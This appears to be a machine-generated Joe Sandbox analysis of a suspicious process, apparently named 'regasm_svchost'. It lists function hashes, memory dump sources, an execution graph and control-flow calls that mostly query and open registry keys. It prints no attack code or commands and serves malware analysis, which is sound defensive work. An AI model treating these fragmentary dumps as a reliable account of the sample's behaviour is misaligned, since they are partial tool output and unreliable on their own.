                                                                  • Opcode ID: 8b478e52ab7f776735fa7f10fc4c98aff6bd74f7618d1881bee1ec5ece220cdc
                                                                  • Instruction ID: 7d1d1c725ca02d57532f17888c7405dfbea95e607ee7bf56d3bded4350ed0dbf
                                                                  • Opcode Fuzzy Hash: 8b478e52ab7f776735fa7f10fc4c98aff6bd74f7618d1881bee1ec5ece220cdc
                                                                  • Instruction Fuzzy Hash: 43410974E0560ADFCB04CFAAC5815AEFBF2AF88301F64C06AC915A7314D7349A85CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C55FE5 Relevance: .1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4603ec56b347b47425f6f04c07f4f48cf4ce7ceba046db5230f0a3d27619eba6
                                                                  • Instruction ID: 4fb460f0a36ec05c743a73b1fd8f386b54c3bb96ad847a9f227b1d05729ac8f0
                                                                  • Opcode Fuzzy Hash: 4603ec56b347b47425f6f04c07f4f48cf4ce7ceba046db5230f0a3d27619eba6
                                                                  • Instruction Fuzzy Hash: 7B410C74E0460A9FCB44CFAAC5815AEFBF2BF88341F64C46AC415A7254D7349686CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C56468 Relevance: .1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c64edbcc8844abeb1bd72a1872d786cd4a8fe736ede55c13bbb697e5a727be8
                                                                  • Instruction ID: f17f614784a98d4af3d1df4a0de50e502d7e3331035c04e26334790892801d99
                                                                  • Opcode Fuzzy Hash: 4c64edbcc8844abeb1bd72a1872d786cd4a8fe736ede55c13bbb697e5a727be8
                                                                  • Instruction Fuzzy Hash: EA41FA74D0060ADFCB44CFAAC5815AEFBB2EB88301F64C06AD915B7314D7349A858FA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C50DD8 Relevance: .1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 153f91290c568b7970cd4f235482d6489a90785efce98bab170114ff8d88b55a
                                                                  • Instruction ID: ddd8db04322e76c40780ce2e5e8987eb28b252a0af9c6feae225071023f485de
                                                                  • Opcode Fuzzy Hash: 153f91290c568b7970cd4f235482d6489a90785efce98bab170114ff8d88b55a
                                                                  • Instruction Fuzzy Hash: 7431C675E046189FEB18CFAB884169EBBB3AFC9301F14C1BAD818AB265DB305945CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5A5A8 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e145cbfc89f60322a432da81e7a4dc975c98eb95bcfad97a32fc432ba2514843
                                                                  • Instruction ID: 019a15f37f0a19a92e00ec7209a42b69ad928eb5741614ec3cceeac5afd576b6
                                                                  • Opcode Fuzzy Hash: e145cbfc89f60322a432da81e7a4dc975c98eb95bcfad97a32fc432ba2514843
                                                                  • Instruction Fuzzy Hash: 22315A71E016198BDB18CFABD8806AEFBF2BF88301F14C16AD918A7254DB300A858F55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C56638 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0dd4933360fc181e12500d23803797463016498e40253fb0603f760ea58f3438
                                                                  • Instruction ID: c8e298bae15f942f117c3442a0d9c19f32f7a2738fa0e26506686d1cb4aa0e1e
                                                                  • Opcode Fuzzy Hash: 0dd4933360fc181e12500d23803797463016498e40253fb0603f760ea58f3438
                                                                  • Instruction Fuzzy Hash: 4331DF75E046188BEB18CFABD94079EFAF3AFC9301F04C1BAD518A7265EB3019458F51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:26.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:378
                                                                  Total number of Limit Nodes:9
                                                                  execution_graph 29474 32650c 29475 326411 29474->29475 29476 32651a 29474->29476 29477 326505 29475->29477 29479 326637 29475->29479 29480 326667 29479->29480 29481 32668f 29480->29481 29514 3279eb 29480->29514 29524 327961 29480->29524 29534 3278e0 29480->29534 29544 3276fd 29480->29544 29557 327a75 29480->29557 29565 327673 29480->29565 29578 3275f2 29480->29578 29591 327b05 29480->29591 29599 327787 29480->29599 29609 32791c 29480->29609 29619 327499 29480->29619 29632 327418 29480->29632 29645 32789b 29480->29645 29655 327b95 29480->29655 29663 327811 29480->29663 29673 3275ad 29480->29673 29686 3279a6 29480->29686 29696 327523 29480->29696 29709 327abd 29480->29709 29717 3276b8 29480->29717 29730 327637 29480->29730 29743 327a30 29480->29743 29751 3273b2 29480->29751 29764 327b4d 29480->29764 29772 3277cc 29480->29772 29782 327742 29480->29782 29792 32745d 29480->29792 29805 3274de 29480->29805 29818 327856 29480->29818 29828 327bd1 29480->29828 29833 3273d3 29480->29833 29846 327568 29480->29846 29515 3279fc KiUserExceptionDispatcher 29514->29515 29517 327a2e 29515->29517 29859 77be30 29517->29859 29864 77be88 29517->29864 29518 327bb6 29519 327bfe 29518->29519 29522 77be30 RegQueryValueExW 29518->29522 29523 77be88 RegQueryValueExW 29518->29523 29519->29481 29522->29519 29523->29519 29525 327972 29524->29525 29526 327a0f KiUserExceptionDispatcher 29525->29526 29533 327a2e 29526->29533 29527 327bb6 29528 327bfe 29527->29528 29531 77be30 RegQueryValueExW 29527->29531 29532 77be88 RegQueryValueExW 29527->29532 29528->29481 29529 77be30 RegQueryValueExW 29529->29527 29530 77be88 RegQueryValueExW 29530->29527 29531->29528 29532->29528 29533->29529 29533->29530 29535 3278f1 29534->29535 29536 327a0f KiUserExceptionDispatcher 29535->29536 29537 327a2e 29536->29537 29540 77be30 RegQueryValueExW 29537->29540 29541 77be88 RegQueryValueExW 29537->29541 29538 327bb6 29539 327bfe 29538->29539 29542 77be30 RegQueryValueExW 29538->29542 29543 77be88 RegQueryValueExW 29538->29543 29539->29481 29540->29538 29541->29538 29542->29539 29543->29539 29545 32770e 29544->29545 29873 771588 29545->29873 29880 7712e0 29545->29880 29546 327727 29547 327a0f KiUserExceptionDispatcher 29546->29547 29548 327a2e 29547->29548 29553 77be30 RegQueryValueExW 29548->29553 29554 77be88 RegQueryValueExW 29548->29554 29549 327bb6 29550 327bfe 29549->29550 29555 77be30 RegQueryValueExW 29549->29555 29556 77be88 RegQueryValueExW 29549->29556 29550->29481 29553->29549 29554->29549 29555->29550 29556->29550 29558 327a86 29557->29558 29561 77be30 RegQueryValueExW 29558->29561 29562 77be88 RegQueryValueExW 29558->29562 29559 327bb6 29560 327bfe 29559->29560 29563 77be30 RegQueryValueExW 29559->29563 29564 77be88 RegQueryValueExW 29559->29564 29560->29481 29561->29559 29562->29559 29563->29560 29564->29560 29566 327684 29565->29566 29572 7712e0 4 API calls 29566->29572 29573 771588 4 API calls 29566->29573 29567 327727 29568 327a0f KiUserExceptionDispatcher 29567->29568 29569 327a2e 29568->29569 29574 77be30 RegQueryValueExW 29569->29574 29575 77be88 RegQueryValueExW 29569->29575 29570 327bb6 29571 327bfe 29570->29571 29576 77be30 RegQueryValueExW 29570->29576 29577 77be88 RegQueryValueExW 29570->29577 29571->29481 29572->29567 29573->29567 29574->29570 29575->29570 29576->29571 29577->29571 29579 327603 29578->29579 29585 7712e0 4 API calls 29579->29585 29586 771588 4 API calls 29579->29586 29580 327727 29581 327a0f KiUserExceptionDispatcher 29580->29581 29582 327a2e 29581->29582 29587 77be30 RegQueryValueExW 29582->29587 29588 77be88 RegQueryValueExW 29582->29588 29583 327bb6 29584 327bfe 29583->29584 29589 77be30 RegQueryValueExW 29583->29589 29590 77be88 RegQueryValueExW 29583->29590 29584->29481 29585->29580 29586->29580 29587->29583 29588->29583 29589->29584 29590->29584 29592 327b16 29591->29592 29595 77be30 RegQueryValueExW 29592->29595 29596 77be88 RegQueryValueExW 29592->29596 29593 327bb6 29594 327bfe 29593->29594 29597 77be30 RegQueryValueExW 29593->29597 29598 77be88 RegQueryValueExW 29593->29598 29594->29481 29595->29593 29596->29593 29597->29594 29598->29594 29600 327798 29599->29600 29601 327a0f KiUserExceptionDispatcher 29600->29601 29602 327a2e 29601->29602 29605 77be30 RegQueryValueExW 29602->29605 29606 77be88 RegQueryValueExW 29602->29606 29603 327bb6 29604 327bfe 29603->29604 29607 77be30 RegQueryValueExW 29603->29607 29608 77be88 RegQueryValueExW 29603->29608 29604->29481 29605->29603 29606->29603 29607->29604 29608->29604 29610 32792d 29609->29610 29611 327a0f KiUserExceptionDispatcher 29610->29611 29612 327a2e 29611->29612 29615 77be30 RegQueryValueExW 29612->29615 29616 77be88 RegQueryValueExW 29612->29616 29613 327bb6 29614 327bfe 29613->29614 29617 77be30 RegQueryValueExW 29613->29617 29618 77be88 RegQueryValueExW 29613->29618 29614->29481 29615->29613 29616->29613 29617->29614 29618->29614 29620 3274aa 29619->29620 29630 7712e0 4 API calls 29620->29630 29631 771588 4 API calls 29620->29631 29621 327727 29622 327a0f KiUserExceptionDispatcher 29621->29622 29623 327a2e 29622->29623 29626 77be30 RegQueryValueExW 29623->29626 29627 77be88 RegQueryValueExW 29623->29627 29624 327bb6 29625 327bfe 29624->29625 29628 77be30 RegQueryValueExW 29624->29628 29629 77be88 RegQueryValueExW 29624->29629 29625->29481 29626->29624 29627->29624 29628->29625 29629->29625 29630->29621 29631->29621 29633 327429 29632->29633 29639 7712e0 4 API calls 29633->29639 29640 771588 4 API calls 29633->29640 29634 327727 29635 327a0f KiUserExceptionDispatcher 29634->29635 29636 327a2e 29635->29636 29641 77be30 RegQueryValueExW 29636->29641 29642 77be88 RegQueryValueExW 29636->29642 29637 327bb6 29638 327bfe 29637->29638 29643 77be30 RegQueryValueExW 29637->29643 29644 77be88 RegQueryValueExW 29637->29644 29638->29481 29639->29634 29640->29634 29641->29637 29642->29637 29643->29638 29644->29638 29646 3278ac 29645->29646 29647 327a0f KiUserExceptionDispatcher 29646->29647 29648 327a2e 29647->29648 29653 77be30 RegQueryValueExW 29648->29653 29654 77be88 RegQueryValueExW 29648->29654 29649 327bb6 29650 327bfe 29649->29650 29651 77be30 RegQueryValueExW 29649->29651 29652 77be88 RegQueryValueExW 29649->29652 29650->29481 29651->29650 29652->29650 29653->29649 29654->29649 29656 327ba6 29655->29656 29661 77be30 RegQueryValueExW 29656->29661 29662 77be88 RegQueryValueExW 29656->29662 29657 327bb6 29658 327bfe 29657->29658 29659 77be30 RegQueryValueExW 29657->29659 29660 77be88 RegQueryValueExW 29657->29660 29658->29481 29659->29658 29660->29658 29661->29657 29662->29657 29664 327822 29663->29664 29665 327a0f KiUserExceptionDispatcher 29664->29665 29666 327a2e 29665->29666 29671 77be30 RegQueryValueExW 29666->29671 29672 77be88 RegQueryValueExW 29666->29672 29667 327bb6 29668 327bfe 29667->29668 29669 77be30 RegQueryValueExW 29667->29669 29670 77be88 RegQueryValueExW 29667->29670 29668->29481 29669->29668 29670->29668 29671->29667 29672->29667 29674 3275be 29673->29674 29680 7712e0 4 API calls 29674->29680 29681 771588 4 API calls 29674->29681 29675 327727 29676 327a0f KiUserExceptionDispatcher 29675->29676 29677 327a2e 29676->29677 29682 77be30 RegQueryValueExW 29677->29682 29683 77be88 RegQueryValueExW 29677->29683 29678 327bb6 29679 327bfe 29678->29679 29684 77be30 RegQueryValueExW 29678->29684 29685 77be88 RegQueryValueExW 29678->29685 29679->29481 29680->29675 29681->29675 29682->29678 29683->29678 29684->29679 29685->29679 29687 3279b7 KiUserExceptionDispatcher 29686->29687 29689 327a2e 29687->29689 29692 77be30 RegQueryValueExW 29689->29692 29693 77be88 RegQueryValueExW 29689->29693 29690 327bb6 29691 327bfe 29690->29691 29694 77be30 RegQueryValueExW 29690->29694 29695 77be88 RegQueryValueExW 29690->29695 29691->29481 29692->29690 29693->29690 29694->29691 29695->29691 29697 327534 29696->29697 29703 7712e0 4 API calls 29697->29703 29704 771588 4 API calls 29697->29704 29698 327727 29699 327a0f KiUserExceptionDispatcher 29698->29699 29700 327a2e 29699->29700 29705 77be30 RegQueryValueExW 29700->29705 29706 77be88 RegQueryValueExW 29700->29706 29701 327bb6 29702 327bfe 29701->29702 29707 77be30 RegQueryValueExW 29701->29707 29708 77be88 RegQueryValueExW 29701->29708 29702->29481 29703->29698 29704->29698 29705->29701 29706->29701 29707->29702 29708->29702 29710 327ace 29709->29710 29715 77be30 RegQueryValueExW 29710->29715 29716 77be88 RegQueryValueExW 29710->29716 29711 327bb6 29712 327bfe 29711->29712 29713 77be30 RegQueryValueExW 29711->29713 29714 77be88 RegQueryValueExW 29711->29714 29712->29481 29713->29712 29714->29712 29715->29711 29716->29711 29718 3276c9 29717->29718 29724 7712e0 4 API calls 29718->29724 29725 771588 4 API calls 29718->29725 29719 327727 29720 327a0f KiUserExceptionDispatcher 29719->29720 29721 327a2e 29720->29721 29726 77be30 RegQueryValueExW 29721->29726 29727 77be88 RegQueryValueExW 29721->29727 29722 327bb6 29723 327bfe 29722->29723 29728 77be30 RegQueryValueExW 29722->29728 29729 77be88 RegQueryValueExW 29722->29729 29723->29481 29724->29719 29725->29719 29726->29722 29727->29722 29728->29723 29729->29723 29731 327648 29730->29731 29741 7712e0 4 API calls 29731->29741 29742 771588 4 API calls 29731->29742 29732 327727 29733 327a0f KiUserExceptionDispatcher 29732->29733 29734 327a2e 29733->29734 29737 77be30 RegQueryValueExW 29734->29737 29738 77be88 RegQueryValueExW 29734->29738 29735 327bb6 29736 327bfe 29735->29736 29739 77be30 RegQueryValueExW 29735->29739 29740 77be88 RegQueryValueExW 29735->29740 29736->29481 29737->29735 29738->29735 29739->29736 29740->29736 29741->29732 29742->29732 29744 327a41 29743->29744 29747 77be30 RegQueryValueExW 29744->29747 29748 77be88 RegQueryValueExW 29744->29748 29745 327bb6 29746 327bfe 29745->29746 29749 77be30 RegQueryValueExW 29745->29749 29750 77be88 RegQueryValueExW 29745->29750 29746->29481 29747->29745 29748->29745 29749->29746 29750->29746 29752 3273b8 29751->29752 29758 7712e0 4 API calls 29752->29758 29759 771588 4 API calls 29752->29759 29753 327727 29754 327a0f KiUserExceptionDispatcher 29753->29754 29755 327a2e 29754->29755 29760 77be30 RegQueryValueExW 29755->29760 29761 77be88 RegQueryValueExW 29755->29761 29756 327bb6 29757 327bfe 29756->29757 29762 77be30 RegQueryValueExW 29756->29762 29763 77be88 RegQueryValueExW 29756->29763 29757->29481 29758->29753 29759->29753 29760->29756 29761->29756 29762->29757 29763->29757 29765 327b5e 29764->29765 29768 77be30 RegQueryValueExW 29765->29768 29769 77be88 RegQueryValueExW 29765->29769 29766 327bb6 29767 327bfe 29766->29767 29770 77be30 RegQueryValueExW 29766->29770 29771 77be88 RegQueryValueExW 29766->29771 29767->29481 29768->29766 29769->29766 29770->29767 29771->29767 29773 3277dd 29772->29773 29774 327a0f KiUserExceptionDispatcher 29773->29774 29775 327a2e 29774->29775 29778 77be30 RegQueryValueExW 29775->29778 29779 77be88 RegQueryValueExW 29775->29779 29776 327bb6 29777 327bfe 29776->29777 29780 77be30 RegQueryValueExW 29776->29780 29781 77be88 RegQueryValueExW 29776->29781 29777->29481 29778->29776 29779->29776 29780->29777 29781->29777 29783 327753 29782->29783 29784 327a0f KiUserExceptionDispatcher 29783->29784 29785 327a2e 29784->29785 29788 77be30 RegQueryValueExW 29785->29788 29789 77be88 RegQueryValueExW 29785->29789 29786 327bb6 29787 327bfe 29786->29787 29790 77be30 RegQueryValueExW 29786->29790 29791 77be88 RegQueryValueExW 29786->29791 29787->29481 29788->29786 29789->29786 29790->29787 29791->29787 29793 32746e 29792->29793 29801 7712e0 4 API calls 29793->29801 29802 771588 4 API calls 29793->29802 29794 327727 29795 327a0f KiUserExceptionDispatcher 29794->29795 29796 327a2e 29795->29796 29803 77be30 RegQueryValueExW 29796->29803 29804 77be88 RegQueryValueExW 29796->29804 29797 327bb6 29798 327bfe 29797->29798 29799 77be30 RegQueryValueExW 29797->29799 29800 77be88 RegQueryValueExW 29797->29800 29798->29481 29799->29798 29800->29798 29801->29794 29802->29794 29803->29797 29804->29797 29806 3274ef 29805->29806 29812 7712e0 4 API calls 29806->29812 29813 771588 4 API calls 29806->29813 29807 327727 29808 327a0f KiUserExceptionDispatcher 29807->29808 29809 327a2e 29808->29809 29814 77be30 RegQueryValueExW 29809->29814 29815 77be88 RegQueryValueExW 29809->29815 29810 327bb6 29811 327bfe 29810->29811 29816 77be30 RegQueryValueExW 29810->29816 29817 77be88 RegQueryValueExW 29810->29817 29811->29481 29812->29807 29813->29807 29814->29810 29815->29810 29816->29811 29817->29811 29819 327867 29818->29819 29820 327a0f KiUserExceptionDispatcher 29819->29820 29821 327a2e 29820->29821 29824 77be30 RegQueryValueExW 29821->29824 29825 77be88 RegQueryValueExW 29821->29825 29822 327bb6 29823 327bfe 29822->29823 29826 77be30 RegQueryValueExW 29822->29826 29827 77be88 RegQueryValueExW 29822->29827 29823->29481 29824->29822 29825->29822 29826->29823 29827->29823 29829 327be2 29828->29829 29830 327bfe 29829->29830 29831 77be30 RegQueryValueExW 29829->29831 29832 77be88 RegQueryValueExW 29829->29832 29830->29481 29831->29830 29832->29830 29834 3273e4 29833->29834 29842 7712e0 4 API calls 29834->29842 29843 771588 4 API calls 29834->29843 29835 327727 29836 327a0f KiUserExceptionDispatcher 29835->29836 29837 327a2e 29836->29837 29844 77be30 RegQueryValueExW 29837->29844 29845 77be88 RegQueryValueExW 29837->29845 29838 327bb6 29839 327bfe 29838->29839 29840 77be30 RegQueryValueExW 29838->29840 29841 77be88 RegQueryValueExW 29838->29841 29839->29481 29840->29839 29841->29839 29842->29835 29843->29835 29844->29838 29845->29838 29847 327579 29846->29847 29853 7712e0 4 API calls 29847->29853 29854 771588 4 API calls 29847->29854 29848 327727 29849 327a0f KiUserExceptionDispatcher 29848->29849 29852 327a2e 29849->29852 29850 327bb6 29851 327bfe 29850->29851 29857 77be30 RegQueryValueExW 29850->29857 29858 77be88 RegQueryValueExW 29850->29858 29851->29481 29855 77be30 RegQueryValueExW 29852->29855 29856 77be88 RegQueryValueExW 29852->29856 29853->29848 29854->29848 29855->29850 29856->29850 29857->29851 29858->29851 29860 77be49 29859->29860 29862 77be6c 29859->29862 29860->29518 29863 77c270 29862->29863 29868 771b00 29862->29868 29863->29518 29867 77bea3 29864->29867 29865 771b00 RegQueryValueExW 29865->29867 29866 77c270 29866->29518 29867->29865 29867->29866 29869 771b11 29868->29869 29870 771b34 RegQueryValueExW 29868->29870 29869->29862 29872 771c1b 29870->29872 29875 7715a7 29873->29875 29874 77180f 29874->29546 29875->29874 29876 771b50 RegQueryValueExW 29875->29876 29877 771b00 RegQueryValueExW 29875->29877 29888 771838 29875->29888 29893 771898 29875->29893 29876->29875 29877->29875 29881 771319 29880->29881 29883 77133c 29880->29883 29881->29546 29882 771369 29882->29546 29883->29882 29884 771b50 RegQueryValueExW 29883->29884 29885 771b00 RegQueryValueExW 29883->29885 29886 771838 RegOpenKeyExW 29883->29886 29887 771898 RegOpenKeyExW 29883->29887 29884->29883 29885->29883 29886->29883 29887->29883 29889 77187c RegOpenKeyExW 29888->29889 29890 771859 29888->29890 29892 77195e 29889->29892 29890->29875 29894 7718ea RegOpenKeyExW 29893->29894 29896 77195e 29894->29896

                                                                  Executed Functions

                                                                  Function 003273B2 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1343 3273b2 1488 3273b2 call 32a628 1343->1488 1489 3273b2 call 32aa48 1343->1489 1490 3273b2 call 32aaa9 1343->1490 1344 3273b8-3273f7 1499 3273f7 call 32ad33 1344->1499 1500 3273f7 call 32b566 1344->1500 1501 3273f7 call 32b9b7 1344->1501 1502 3273f7 call 32ac95 1344->1502 1503 3273f7 call 32b958 1344->1503 1504 3273f7 call 32ac98 1344->1504 1505 3273f7 call 32adb8 1344->1505 1506 3273f7 call 32ada8 1344->1506 1347 3273fd-3274bd 1521 3274bd call 32be80 1347->1521 1522 3274bd call 32c027 1347->1522 1523 3274bd call 32c127 1347->1523 1524 3274bd call 32c068 1347->1524 1525 3274bd call 32c0c8 1347->1525 1526 3274bd call 32be7d 1347->1526 1356 3274c3-327502 1535 327502 call 32c188 1356->1535 1536 327502 call 32c1e8 1356->1536 1359 327508-32758c 1547 32758c call 32dbf3 1359->1547 1548 32758c call 32dca7 1359->1548 1549 32758c call 32dc48 1359->1549 1365 327592-327652 1564 327652 call 32ec30 1365->1564 1565 327652 call 32ed80 1365->1565 1566 327652 call 32ee41 1365->1566 1567 327652 call 32eddf 1365->1567 1374 327658-327697 1570 327697 call 32eea0 1374->1570 1571 327697 call 32ee41 1374->1571 1377 32769d-3276dc 1575 3276dc call 770012 1377->1575 1576 3276dc call 770048 1377->1576 1380 3276e2-327721 1492 327721 call 7712e0 1380->1492 1493 327721 call 771588 1380->1493 1383 327727-327766 1507 327766 call 771c81 1383->1507 1508 327766 call 771d30 1383->1508 1386 32776c-3277ab 1519 3277ab call 771e48 1386->1519 1520 3277ab call 771ef8 1386->1520 1389 3277b1-32787a 1540 32787a call 778270 1389->1540 1541 32787a call 7784e0 1389->1541 1542 32787a call 7785df 1389->1542 1398 327880-327940 1550 327940 call 779c40 1398->1550 1551 327940 call 779ce0 1398->1551 1552 327940 call 779d3f 1398->1552 1553 327940 call 779c38 1398->1553 1407 327946-327985 1561 327985 call 779e00 1407->1561 1562 327985 call 779e5f 1407->1562 1563 327985 call 779da8 1407->1563 1410 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 1527 327bb0 call 77be30 1410->1527 1528 327bb0 call 77be88 1410->1528 1433 327bb6-327bf8 1537 327bf8 call 77c347 1433->1537 1538 327bf8 call 77be30 1433->1538 1539 327bf8 call 77be88 1433->1539 1436 327bfe-327c40 1543 327c40 call 77c3a8 1436->1543 1544 327c40 call 77c408 1436->1544 1439 327c46-327d0c 1556 327d0c call 77ce47 1439->1556 1557 327d0c call 77ca71 1439->1557 1558 327d0c call 77cb20 1439->1558 1559 327d0c call 77cee0 1439->1559 1560 327d0c call 77ce6f 1439->1560 1448 327d12-327d54 1568 327d54 call 77d215 1448->1568 1569 327d54 call 77d230 1448->1569 1451 327d5a-327d9c 1572 327d9c call 77d458 1451->1572 1573 327d9c call 77d4b8 1451->1573 1454 327da2-327de4 1577 327de4 call 77da97 1454->1577 1578 327de4 call 77d9d8 1454->1578 1579 327de4 call 77da38 1454->1579 1457 327dea-327e2c 1494 327e2c call 77dba0 1457->1494 1495 327e2c call 77daf8 1457->1495 1496 327e2c call 77db08 1457->1496 1497 327e2c call 77dbe8 1457->1497 1498 327e2c call 77db98 1457->1498 1460 327e32-327e74 1509 327e74 call 77e116 1460->1509 1510 327e74 call 77e210 1460->1510 1511 327e74 call 77dba0 1460->1511 1512 327e74 call 77de7c 1460->1512 1513 327e74 call 77e168 1460->1513 1514 327e74 call 77e1b8 1460->1514 1515 327e74 call 77daf8 1460->1515 1516 327e74 call 77db08 1460->1516 1517 327e74 call 77dbe8 1460->1517 1518 327e74 call 77db98 1460->1518 1463 327e7a-327f62 1529 327f62 call 77f3c7 1463->1529 1530 327f62 call 77f311 1463->1530 1531 327f62 call 77f1b0 1463->1531 1532 327f62 call 77f270 1463->1532 1533 327f62 call 77f218 1463->1533 1534 327f62 call 77f368 1463->1534 1473 327f68-327ff2 1545 327ff2 call 77f816 1473->1545 1546 327ff2 call 77f878 1473->1546 1479 327ff8-32806a 1554 32806a call 680048 1479->1554 1555 32806a call 680006 1479->1555 1485 328070-3280bf 1488->1344 1489->1344 1490->1344 1492->1383 1493->1383 1494->1460 1495->1460 1496->1460 1497->1460 1498->1460 1499->1347 1500->1347 1501->1347 1502->1347 1503->1347 1504->1347 1505->1347 1506->1347 1507->1386 1508->1386 1509->1463 1510->1463 1511->1463 1512->1463 1513->1463 1514->1463 1515->1463 1516->1463 1517->1463 1518->1463 1519->1389 1520->1389 1521->1356 1522->1356 1523->1356 1524->1356 1525->1356 1526->1356 1527->1433 1528->1433 1529->1473 1530->1473 1531->1473 1532->1473 1533->1473 1534->1473 1535->1359 1536->1359 1537->1436 1538->1436 1539->1436 1540->1398 1541->1398 1542->1398 1543->1439 1544->1439 1545->1479 1546->1479 1547->1365 1548->1365 1549->1365 1550->1407 1551->1407 1552->1407 1553->1407 1554->1485 1555->1485 1556->1448 1557->1448 1558->1448 1559->1448 1560->1448 1561->1410 1562->1410 1563->1410 1564->1374 1565->1374 1566->1374 1567->1374 1568->1451 1569->1451 1570->1377 1571->1377 1572->1454 1573->1454 1575->1380 1576->1380 1577->1457 1578->1457 1579->1457
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: fd6f52475499fea8107d257a636181e511ccc9937679eff8db1750a5d92ea408
                                                                  • Instruction ID: 2c823de0edb8177d61524c95c9a2d21204c1e3ae2c2552e778e64bcd2f67ac60
                                                                  • Opcode Fuzzy Hash: fd6f52475499fea8107d257a636181e511ccc9937679eff8db1750a5d92ea408
                                                                  • Instruction Fuzzy Hash: F502C938906328CFCB65DF20D898799B7B1BF49306F2089D9D41A97750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003273D3 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1580 3273d3-3273f7 1784 3273f7 call 32ad33 1580->1784 1785 3273f7 call 32b566 1580->1785 1786 3273f7 call 32b9b7 1580->1786 1787 3273f7 call 32ac95 1580->1787 1788 3273f7 call 32b958 1580->1788 1789 3273f7 call 32ac98 1580->1789 1790 3273f7 call 32adb8 1580->1790 1791 3273f7 call 32ada8 1580->1791 1584 3273fd-3274bd 1806 3274bd call 32be80 1584->1806 1807 3274bd call 32c027 1584->1807 1808 3274bd call 32c127 1584->1808 1809 3274bd call 32c068 1584->1809 1810 3274bd call 32c0c8 1584->1810 1811 3274bd call 32be7d 1584->1811 1593 3274c3-327502 1731 327502 call 32c188 1593->1731 1732 327502 call 32c1e8 1593->1732 1596 327508-32758c 1743 32758c call 32dbf3 1596->1743 1744 32758c call 32dca7 1596->1744 1745 32758c call 32dc48 1596->1745 1602 327592-327652 1760 327652 call 32ec30 1602->1760 1761 327652 call 32ed80 1602->1761 1762 327652 call 32ee41 1602->1762 1763 327652 call 32eddf 1602->1763 1611 327658-327697 1766 327697 call 32eea0 1611->1766 1767 327697 call 32ee41 1611->1767 1614 32769d-3276dc 1771 3276dc call 770012 1614->1771 1772 3276dc call 770048 1614->1772 1617 3276e2-327721 1777 327721 call 7712e0 1617->1777 1778 327721 call 771588 1617->1778 1620 327727-327766 1792 327766 call 771c81 1620->1792 1793 327766 call 771d30 1620->1793 1623 32776c-3277ab 1804 3277ab call 771e48 1623->1804 1805 3277ab call 771ef8 1623->1805 1626 3277b1-32787a 1736 32787a call 778270 1626->1736 1737 32787a call 7784e0 1626->1737 1738 32787a call 7785df 1626->1738 1635 327880-327940 1746 327940 call 779c40 1635->1746 1747 327940 call 779ce0 1635->1747 1748 327940 call 779d3f 1635->1748 1749 327940 call 779c38 1635->1749 1644 327946-327985 1757 327985 call 779e00 1644->1757 1758 327985 call 779e5f 1644->1758 1759 327985 call 779da8 